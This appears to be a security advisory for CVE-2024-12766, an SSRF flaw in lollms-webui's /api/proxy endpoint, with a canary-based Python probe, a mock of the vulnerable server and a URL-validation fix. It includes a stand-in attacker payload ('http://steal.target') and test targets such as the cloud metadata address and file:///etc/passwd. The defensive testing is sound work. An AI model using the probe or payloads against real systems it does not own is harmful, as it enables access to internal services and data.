CVE-2024-12766 describes a Server-Side Request Forgery (SSRF) vulnerability in parisneo's lollms-webui, specifically in the /api/proxy REST API. The flaw lets an attacker make the server issue HTTP requests on their behalf, using the server's network position and credentials to reach internal or external resources the attacker could not reach directly. It affects lollms-webui versions up to and including the latest release (V13, feather) and requires immediate attention.
The SSRF vulnerability in lollms-webui lets an attacker submit attacker-chosen requests through the /api/proxy endpoint. By controlling the url parameter of a POST request (e.g., {"url":"http://steal.target"}), the attacker forces the server to fetch an arbitrary internal or external URL. Because the request originates from the server, it can reach services that trust the server's network position, such as admin interfaces bound to localhost, internal APIs or cloud instance-metadata endpoints, and whatever those services return may be exposed to the attacker. The impact is larger when the server holds privileged credentials or sits on a flat internal network, since the endpoint then becomes a pivot for lateral movement and the blast radius widens accordingly.
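The request shape described above can be checked safely against a deployment by pointing the url parameter at a listener you control. The block below is an added example, not lollms-webui code: it starts a canary listener, sends the POST /api/proxy request with a JSON body {"url": ...} as the advisory describes, and reports whether the canary was contacted, so the check works even when the endpoint returns nothing useful (a blind SSRF). It also contains a constructed mock of the vulnerable behaviour (a server that fetches whatever URL it is given) so the probe can be exercised offline; that mock is this example's stand-in, not the project's code. Assumptions: the endpoint accepts JSON and needs no extra headers; pass any authentication header your deployment requires via the headers argument.

```python
import json
import threading
import time
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


class Canary:
    """Listener you control; every request path it receives is recorded in .hits."""

    def __init__(self, host="127.0.0.1"):
        self.hits = []
        outer = self

        class Handler(BaseHTTPRequestHandler):
            def do_GET(self):
                outer.hits.append(self.path)
                self.send_response(204)
                self.end_headers()

            def log_message(self, *args):  # keep the console quiet
                pass

        self.server = HTTPServer((host, 0), Handler)  # port 0: pick a free port
        self.url = "http://%s:%d/ssrf-canary" % self.server.server_address
        threading.Thread(target=self.server.serve_forever, daemon=True).start()

    def close(self):
        self.server.shutdown()
        self.server.server_close()


class MockVulnerableProxy:
    """Constructed stand-in for the behaviour the advisory describes (NOT lollms
    code): POST /api/proxy with {"url": ...} makes the server fetch that URL
    without any validation. Exists only so the probe can be run offline."""

    def __init__(self, host="127.0.0.1"):
        class Handler(BaseHTTPRequestHandler):
            def do_POST(self):
                if self.path != "/api/proxy":
                    self.send_response(404)
                    self.end_headers()
                    return
                length = int(self.headers.get("Content-Length", 0))
                target = json.loads(self.rfile.read(length))["url"]
                try:  # the SSRF: a server-side fetch of an attacker-chosen URL
                    with urllib.request.urlopen(target, timeout=3) as r:
                        body, code = r.read(), 200
                except urllib.error.URLError as e:
                    body, code = str(e).encode(), 502
                self.send_response(code)
                self.end_headers()
                self.wfile.write(body)

            def log_message(self, *args):
                pass

        self.server = HTTPServer((host, 0), Handler)
        self.url = "http://%s:%d" % self.server.server_address
        threading.Thread(target=self.server.serve_forever, daemon=True).start()

    def close(self):
        self.server.shutdown()
        self.server.server_close()


def probe_ssrf(base_url, canary, headers=None, timeout=5.0):
    """POST {"url": canary.url} to <base_url>/api/proxy and report whether the
    canary was contacted. Returns (canary_hit, http_status_or_None). The canary,
    not the response body, is the oracle, so a blind SSRF still shows up."""
    before = len(canary.hits)
    body = json.dumps({"url": canary.url}).encode()
    hdrs = {"Content-Type": "application/json"}
    hdrs.update(headers or {})  # e.g. an auth header (assumption: none needed by default)
    req = urllib.request.Request(base_url.rstrip("/") + "/api/proxy",
                                 data=body, headers=hdrs, method="POST")
    status = None
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status = resp.status
    except urllib.error.HTTPError as e:
        status = e.code  # a 4xx/5xx is still an answer from the endpoint
    except (urllib.error.URLError, OSError):
        status = None  # endpoint unreachable or timed out
    deadline = time.monotonic() + timeout
    while len(canary.hits) == before and time.monotonic() < deadline:
        time.sleep(0.05)  # the server's outbound fetch may lag its reply
    return len(canary.hits) > before, status
```

Against a live instance, call probe_ssrf("http://<lollms-host>:<port>", Canary()): a result of (True, ...) means the server reached your listener and the endpoint is exploitable; after the mitigations below are in place the same call should return (False, ...) with a 4xx status.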
CVE-2024-12766 was publicly disclosed on 2025-03-20. There is currently no indication of active exploitation and it is not listed in CISA's KEV catalog. Its EPSS score is low (0.12%, 32nd percentile). No public proof-of-concept (PoC) code is listed, but the request needed to trigger the flaw is simple, so expect PoCs to appear. Monitor security advisories and vulnerability databases for updates.
Exploit Status
EPSS: 0.12% (32nd percentile)
CISA SSVC: no value listed
CVSS Vector: no value listed
While a direct patch for CVE-2024-12766 is pending, several mitigations reduce the risk. The most effective is to restrict outbound network access from the lollms-webui server (egress filtering), so that even a successful SSRF can only reach hosts you have explicitly allowed. Add strict URL validation to the /api/proxy endpoint: accept only http and https, resolve the hostname and reject any target that resolves to a loopback, private, link-local (including cloud instance-metadata) or otherwise non-public address, and repeat that check on every redirect hop instead of following redirects blindly; a hostname allowlist is stronger still. A Web Application Firewall (WAF) can block obvious payloads, but treat it as defence in depth only, since an SSRF payload is just a URL and is easy to disguise. Regularly review the server's configuration and make sure that security mechanisms like forbid_remote_access and check_access are enabled and enforced for this endpoint. After applying these workarounds, verify them by sending the same request with a URL that points at a listener you control: if the listener is never contacted, the mitigation holds.
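The URL-validation mitigation above, as an added example (not lollms-webui's own code): the check is made on the resolved addresses rather than on the hostname text, so tricks such as localhost, 0x7f000001 or an IPv4-mapped IPv6 literal are caught, and the address that passed is returned so the caller can connect to it directly (a defence against DNS rebinding between check and fetch). The same function should be applied to the Location header of every redirect. The names is_safe_proxy_target and demo_resolve are this example's, not the project's, and demo_resolve is a constructed lookup table so the example runs offline; the default resolver uses the real DNS.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = ("http", "https")


def _default_resolve(host):
    """Resolve a hostname to all of its addresses (A and AAAA) via the system resolver.
    Odd literals such as 0x7f000001 or 2130706433 are normalised here too, so the
    address check below still applies to them."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def demo_resolve(host):
    """Constructed resolver table used for the offline demonstration only."""
    table = {
        "steal.target": ["93.184.216.34"],
        "api.example.com": ["93.184.216.34"],
        "localhost": ["127.0.0.1"],
        "mixed.example.com": ["93.184.216.34", "10.0.0.5"],  # one public, one private record
    }
    if host not in table:
        raise OSError("unknown host: %s" % host)
    return table[host]


def _is_public(ip_text):
    addr = ipaddress.ip_address(ip_text)
    # an IPv4-mapped IPv6 literal (::ffff:127.0.0.1) must be judged as the embedded IPv4
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    # is_global is False for loopback, RFC 1918, link-local (incl. 169.254.169.254),
    # CGNAT 100.64/10, documentation, reserved and unspecified ranges
    return addr.is_global


def is_safe_proxy_target(url, allowed_hosts=None, resolve=_default_resolve):
    """Return (allowed, reason, pinned_ip). pinned_ip is the address the caller
    should actually connect to (sending the original Host header), so DNS cannot
    change between this check and the fetch."""
    try:
        parts = urlparse(url)
    except ValueError as e:
        return False, "unparseable url: %s" % e, None
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme, None
    host = parts.hostname
    if not host:
        return False, "missing host", None
    if parts.username or parts.password:
        return False, "credentials in url not allowed", None
    if allowed_hosts is not None and host.lower() not in {h.lower() for h in allowed_hosts}:
        return False, "host not in allowlist: %s" % host, None
    try:
        addrs = [str(ipaddress.ip_address(host))]  # plain IP literal: no lookup needed
    except ValueError:
        try:
            addrs = resolve(host)
        except OSError as e:  # socket.gaierror is a subclass of OSError
            return False, "cannot resolve %s: %s" % (host, e), None
    if not addrs:
        return False, "no addresses for %s" % host, None
    # every record must be public: a name with one private A record is still a
    # way into the internal network
    for ip in addrs:
        if not _is_public(ip):
            return False, "%s resolves to non-public address %s" % (host, ip), None
    return True, "ok", addrs[0]


if __name__ == "__main__":
    for u in ("http://steal.target/", "http://localhost:8000/", "http://169.254.169.254/latest/meta-data/",
              "http://[::ffff:127.0.0.1]/", "file:///etc/passwd", "http://mixed.example.com/"):
        print(u, "->", is_safe_proxy_target(u, resolve=demo_resolve))
```

Note that without an allowlist the validator still lets the advisory's example http://steal.target through, because it is a public host; the address check only stops the proxy from reaching the internal network, which is why an allowlist or egress filtering is the stronger control.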
Update lollms-webui as soon as a release that addresses CVE-2024-12766 is published, and check its release notes to confirm that the /api/proxy fix and any additional mitigations are included; until then, rely on the workarounds above.
CVE-2024-12766 is a Server-Side Request Forgery (SSRF) vulnerability in the /api/proxy endpoint of lollms-webui, affecting versions up to and including V13 (feather); it lets an attacker make the server issue HTTP requests to URLs of the attacker's choosing.
If you are running lollms-webui version V13 (feather) or earlier, you are potentially affected by this SSRF vulnerability.
A direct patch is pending. Mitigate by restricting outbound network access, validating URLs, and using a WAF.
There is currently no confirmed evidence of active exploitation, but the vulnerability's nature makes it a potential target.
Refer to the parisneo/lollms-webui repository and relevant security forums for updates and advisories.